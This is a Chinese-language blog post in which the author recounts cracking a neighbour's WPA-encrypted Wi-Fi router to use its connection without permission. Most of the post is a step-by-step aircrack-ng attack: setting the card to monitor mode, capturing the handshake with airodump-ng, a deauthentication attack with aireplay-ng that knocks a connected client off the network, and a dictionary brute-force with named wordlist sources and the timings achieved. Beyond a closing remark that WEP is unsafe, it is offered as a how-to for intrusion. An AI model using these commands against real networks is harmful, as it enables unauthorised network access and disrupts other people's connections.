|
|
很久以前破解过一个WEP加密的无线路由,很惬意的用了一段时间。可是这个无线路由信号不够强,网络还不够完美。与此同时,有另外一个无线路由存在,信号很不错,可惜是WPA加密的,不好破解。这就好比是狮子身边有两只羊,瘦弱的一个已经被吃掉了,强壮的那个跑得快,不好捉。今天,我决定对它下手。
硬件环境:Macbook 061,Atheros Communications Inc. AR5008 Wireless Network Adapter.无线网卡驱动为ath9k.驱动完善.注意:不是所有的无线网卡都可以用来破解无线路由。
软件环境:Debian/Gnu Linux sid kernel 2.6.32-trunk-686
准备工作:
安装aircrack-ng
aptitude install aircrack-ng
寻找下手的对象
iwlist scanning
可以看到很多合适的无线路由,可以看到它们的essid以及bssid,频道以及加密信息。WPA2加密的就算了吧。
和WEP相比,WPA1不太容易破解。前者似乎可以直接截获密码,后者则是需要挂一个字典来进行暴力破解。
破解流程:(来自aircrack官方教程)
1.停掉无线网卡,重新设置无线网卡的模式:
ifconfig wlan0 down
iwconfig wlan0 mode monitor channel 11
这个意思是将无线网卡的频道设为11,这就是我要破解的无线路由使用的频道。将网卡的模式设为监听,这样就可以截获别无线网的信号了。
2.采集无线网卡的验证“握手”信息
airodump-ng -c 11 --bssid 00:14:6C:7E:40:80 -w psk wlan0
-c 11意思是只采集第11频道的信息,--bssid 00:14:6C:7E:40:80意思是只采集00:14:6C:7E:40:80这个无线路由的信号。
这样可以避免采集了多余的信息。
接着,可以看到无线网卡已经在不停的收集信息了。如果看到类似下面的一行信息,发现有handshake字样,意味着截获了握手的信息。
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
3.欺骗无线路由以获得验证信息。
如果迟迟得不到握手信息,可以考虑欺骗一下无线路由,强迫某个无线网用户重新验证。选择一个比较活跃的无线网卡动手吧!
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0
其中
-0 意思是虚假验证
1 是攻击的次数。觉得不够可以再加。
-a 00:14:6C:7E:40:80 这是无线路由的MAC地址
-c 00:0F:B5:FD:FB:C2 这是某个连接在无线路由上的无线网卡的MAC
wlan0是使用的无线网网卡名称
4.字典破解
如果得到了握手信息,就可以挂上字典来强行攻击了。
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
其中,password.lst是一个字典文件。这个文件很重要。不在乎时间的话,可以选择一个庞大的字典来进行攻击。字典下载的地方可以在
www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
找到。我选择了一个比较庞大的字典
theargon.com/achilles/wordlists/theargonlists/theargonlistver2.zip
压缩包84M左右,解压缩以后有2G左右。
我自己的破解大概花了一个下午加上一个晚上的时间。下午用了大概两个小时采集握手信息(实际上不需要这么久)。挂上字典开始暴力破解,早上再去看的时候就找到了密码,一个8位的英文专业术语。字典破解耗时10:41:48,一共测试了31068348个密码。如果手头上有一个4核的强悍机器,破解的时间会大大缩短。
总结:
1.破解WEP无线网络很简单.WEP加密不可靠,别用了.好歹用个WPA吧!
2.WPA1的破解也很有希望。破解的难度大于WEP。 |
|
